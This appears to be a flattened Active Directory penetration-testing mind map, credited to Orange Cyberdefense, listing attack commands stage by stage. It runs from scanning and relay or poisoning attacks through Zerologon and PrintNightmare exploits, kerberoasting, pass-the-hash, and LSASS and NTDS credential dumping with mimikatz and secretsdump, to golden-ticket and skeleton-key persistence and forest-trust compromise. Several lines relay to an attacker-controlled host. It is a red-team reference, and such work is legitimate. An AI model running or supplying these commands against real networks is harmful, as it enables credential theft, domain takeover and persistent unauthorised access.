1. Scan Network
    1. cme smb <ip_range> # enumerate smb hosts
    2. nmap -sP -p <ip> # ping scan
    3. nmap -PN -sV --top-ports 50 --open <ip> # quick scan
    4. nmap -PN --script smb-vuln* -p139,445 <ip> # search smb vuln
    5. nmap -PN -sC -sV <ip> # classic scan
    6. nmap -PN -sC -sV -p- <ip> # full scan
    7. nmap -sU -sC -sV <ip> # udp scan
    8. find vulnerable host
  2. find AD IP
    1. nmcli dev show eth0 # show domain name & dns
    2. nslookup -type=SRV _ldap._tcp.dc._msdcs.//DOMAIN/
  3. zone transfert
    1. dig axfr <domain_name> @<name_server>
  4. List guest access on smb share
    1. enum4linux -a -u "" -p "" <dc-ip> && enum4linux -a -u "guest" -p "" <dc-ip>
    2. smbmap -u "" -p "" -P 445 -H <dc-ip> && smbmap -u "guest" -p "" -P 445 -H <dc-ip>
    3. smbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip>
    4. cme smb <ip> -u '' -p '' # enumerate null session
    5. cme smb <ip> -u 'a' -p '' # enumerate anonymous access
  5. Enumerate ldap
    1. nmap -n -sV --script "ldap* and not brute" -p 389 <dc-ip>
    2. ldapsearch -x -h <ip> -s base
    3. user found
  6. Find user list
    1. enum4linux -U <dc-ip> | grep 'user:'
    2. crackmapexec smb <ip> -u <user> -p '<password>' --users
    3. OSINT - enumerate username on internet
      1. nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>
    4. user found
  7. relay/poisoning
    1. find smb not signed
      1. nmap -Pn -sS -T4 --open --script smb-security-mode -p445 ADDRESS/MASK
      2. use exploit/windows/smb/smb_relay
      3. cme smb $hosts --gen-relay-list relay.txt
      4. unsigned SMB
    2. PetitPotam.py -d <domain> <listener_ip> <target_ip>
    3. responder -i eth0
    4. mitm6 -d <domain>
    5. user & hash found
  8. zerologon
    1. python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip> secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\$@<IP> -no-pass -just-dc-user "Administrator" secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP>
      1. python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>
  9. mayfly (@M4yFly)
  10. Got one account on the domain
    1. Get all users
      1. GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
    2. enumerate SMB share
      1. cme smb <ip> -u <user> -p <password> --shares
    3. bloodhound
      1. bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
    4. powerview / pywerview
    5. kerberoasting
      1. Get hash
        1. GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
        2. Rubeus kerberoast
        3. hash found
      2. Get kerberoastable users
        1. Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
        2. MATCH (u:User {hasspn:true}) RETURN u
        3. MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
    6. MS14-068
      1. FindSMB2UPTime.py <ip>
        1. rpcclient $> lookupnames <name> wmic useraccount get name,sid auxiliary/admin/kerberos/ms14_068_kerberos_checksum
        2. goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>
          1. kerberos::ptc "<ticket>"
    7. dnscmd.exe /config /serverlevelplugindll <\\path\to\dll> # need a dnsadmin user
      1. sc \\DNSServer stop dns sc \\DNSServer start dns
    8. PrintNightmare
      1. CVE-2021-1675.py <domain>/<user>:<password>@<target> '\\<smb_server_ip>\<share>\inject.dll'
    9. enum dns
      1. dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query <dc_ip>
  11. Got valid username
    1. Password spray
      1. Get password policy
        1. crackmapexec <IP> -u 'user' -p 'password' --pass-pol
        2. enum4linx -u 'username' -p 'password' -P <IP>
      2. cme smb <dc-ip> -u user.txt -p password.txt --no-bruteforce # test user=password
      3. cme smb <dc-ip> -u user.txt -p password.txt # multiple test (carrefull of lock policy)
      4. credentials found
    2. ASREPRoast
      1. Get hash
        1. python GetNPUsers.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>
        2. Rubeus asreproast /format:hashcat
      2. Get ASREPRoastable users
        1. Get-DomainUser -PreauthNotRequired -Properties SamAccountName
        2. MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
      3. hash found
  12. Lateral move
    1. pass the hash
      1. psexec.py -hashes ":<hash>" <user>@<ip>
      2. wmiexec.py -hashes ":<hash>" <user>@<ip>
      3. atexec.py -hashes ":<hash>" <user>@<ip> "command"
      4. evil-winrm -i <ip>/<domain> -u <user> -H <hash>
      5. xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>
    2. overpass the hash / pass the key (PTK)
      1. python getTGT.py <domain>/<user> -hashes :<hashes>
        1. export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache
          1. python psexec.py <domain>/<user>@<ip> -k -no-pass
      2. Rubeus asktgt /user:victim /rc4:<rc4value>
        1. Rubeus ptt /ticket:<ticket>
        2. Rubeus createnetonly /program:C:\Windows\System32\[cmd.exe||upnpcont.exe]
          1. Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
    3. Unconstrained delegation
      1. Get tickets
        1. privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
        2. Rubeus dump /service:krbtgt /nowrap
        3. Rubeus dump /luid:0xdeadbeef /nowrap
      2. Get unconstrained delegation machines
        1. Get-NetComputer -Unconstrained
        2. Get-DomainComputer -Unconstrained -Properties DnsHostName
        3. MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
        4. MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p
    4. Constrained delegation
      1. Get tickets
        1. privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
        2. Rubeus dump /service:krbtgt /nowrap
        3. Rubeus dump /luid:0xdeadbeef /nowrap
      2. Get constrained delegation machines
        1. Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo
        2. MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p
        3. MATCH (u:User {owned:true}), (c:Computer {name: "<MYTARGET.FQDN>"}), p=shortestPath((u)-[*1..]->(c)) RETURN p
    5. Resource-Based Constrained Delegation
    6. dcsync
      1. lsadump::dcsync /domain:htb.local /user:krbtgt # Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts
    7. WSUSpect
      1. WSUSpendu.ps1 # need compromised WSUS server
    8. sccm
      1. CMPivot
    9. MSSQL Trusted Links
      1. use exploit/windows/mssql/mssql_linkcrawler
    10. Printers spooler service abuse
      1. rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN
        1. printerbug.py '<domain>/<username>:<password>'@<Printer IP> <RESPONDERIP>
    11. AD acl abuse
      1. aclpwn.py
        1. GenericAll on User
        2. GenericAll on Group
        3. GenericAll / GenericWrite / Write on Computer
        4. WriteProperty on Group
        5. Self (Self-Membership) on Group
        6. WriteProperty (Self-Membership)
        7. ForceChangePassword
        8. WriteOwner on Group
        9. GenericWrite on User
        10. WriteDACL + WriteOwner
    12. GPO Delegation
    13. get laps passwords
      1. Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
      2. foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
    14. privexchange
      1. python privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>
        1. ntlmrelayx.py -t ldap://<dc_fqdn>--escalate-user <user>
    15. ADCS
  13. Kindly provided by Orange Cyberdefense ;-) Some commands can break stuff, be sure to know what are you doing ! Please find legend below.
  14. Bloodhound
  15. PowerView
  16. find hash
    1. crack hash
      1. LM
        1. john --format=lm hash.txt
        2. hashcat -m 3000 -a 3 hash.txt
      2. NTLM
        1. john --format=nt hash.txt
        2. hashcat -m 1000 -a 3 hash.txt
      3. NTLMv1
        1. john --format=netntlm hash.txt
        2. hashcat -m 5500 -a 3 hash.txt
      4. NTLMv2
        1. john --format=netntlmv2 hash.txt
        2. hashcat -m 5600 -a 0 hash.txt rockyou.txt
      5. Kerberos 5 TGS
        1. john spn.txt --format=krb5tgs --wordlist=rockyou.txt
        2. hashcat -m 13100 -a 0 spn.txt rockyou.txt
      6. Kerberos ASREP
        1. hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.txt
  17. relay
    1. MS08-068
      1. use exploit/windows/smb/smb_relay #windows200 / windows server2008
    2. responder -I eth0 # disable smb & http
      1. ntlmrelayx.py -tf targets.txt
    3. mitm6 -i eth0 -d <domain>
      1. ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp -socks -debug
      2. ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
      3. ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> --delegate-access
        1. getST.py -spn cifs/<target> <domain>/<netbios_name>\$ -impersonate <user>
    4. adcs
      1. ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController
        1. Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
  18. Domain admin
    1. dump ntds.dit
      1. crackmapexec smb 127.0.0.1 -u <user> -p <password> -d <domain> --ntds
      2. secretsdump.py '<domain>/<user>:<pass>'@<ip>
      3. ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
        1. secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
      4. windows/gather/credentials/domain_hashdump
  19. Persistance
    1. net group "domain admins" myuser /add /domain
    2. Golden ticket
      1. ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> <user>
    3. Silver Ticket
    4. DSRM
      1. PowerShell New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
    5. Skeleton Key
      1. mimikatz "privilege::debug" "misc::skeleton" "exit"
    6. Custom SSP
      1. mimikatz "privilege::debug" "misc::memssp" "exit"
        1. C:\Windows\System32\kiwissp.log
    7. ...
  20. Administrator access
    1. get credentials
      1. procdump.exe -accepteula -ma lsass.exe lsass.dmp
        1. mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
      2. mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
      3. post/windows/gather/smart_hashdump
        1. hashdump
      4. cme smb <ip_range> -u <user> -p <password> -M lsassy
      5. cme smb <ip_range> -u <user> -p '<password>' --sam / --lsa / --ntds
    2. LSA as a Protected Process
      1. PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp
      2. mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-" #with mimidriver.sys
    3. search password files
      1. findstr /si 'password' *.txt *.xml *.docx
    4. search stored password
      1. lazagne.exe all
    5. shadow copies
      1. diskshadow list shadows all
        1. mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
    6. token manipulation
      1. .\incognito.exe list_tokens -u
        1. .\incognito.exe execute -c "<domain>\<user>" powershell.exe
      2. use incognito
        1. impersonate_token <domain>\\<user>
    7. dpapi extract
  21. Low hanging fruit
    1. java rmi
      1. exploit/multi/misc/java_rmi_server
    2. ms17-010
      1. exploit/windows/smb/ms17_010_eternalblue
    3. tomcat/jboss manager
      1. auxiliary/scanner/http/tomcat_enum exploit/multi/http/tomcat_mgr_deploy
    4. java serialized port
      1. ysoserial
    5. vulnerable product with cve
      1. searchsploit
    6. MS14-025
      1. use scanner/smb/smb_enum_gpp
      2. findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
    7. database credentials
      1. use admin/mssql/mssql_enum_sql_logins
    8. proxylogon
    9. proxyshell
  22. Low access
    1. winpeas.exe
    2. search password files
      1. findstr /si 'password' *.txt *.xml *.docx
    3. Juicy Potato / Lovely Potato
    4. PrintSpoofer
    5. RoguePotato
    6. SMBGhost CVE-2020-0796
    7. CVE-2021-36934 (HiveNightmare/SeriousSAM)
    8. ...
  23. Trust relationship
    1. Child Domain to Forest Compromise - SID Hijacking
      1. Get-NetGroup -Domain <domain> -GroupName "Enterprise Admins" -FullData|select objectsid
        1. mimikatz lsadump::trust
          1. kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt
    2. Forest to Forest Compromise - Trust Ticket
      1. "lsadump::trust /patch" "lsadump::lsa /patch"
        1. "kerberos::golden /user:Administrator /domain:<domain> /sid: <domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_domain> /ticket: <golden_ticket_path>"
          1. .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt
    3. Breaking forest trust
      1. printerbug or petitpotam to force the DC of the external forest to connect on a local unconstrained delegation machine. Capture TGT, inject into memory and dcsync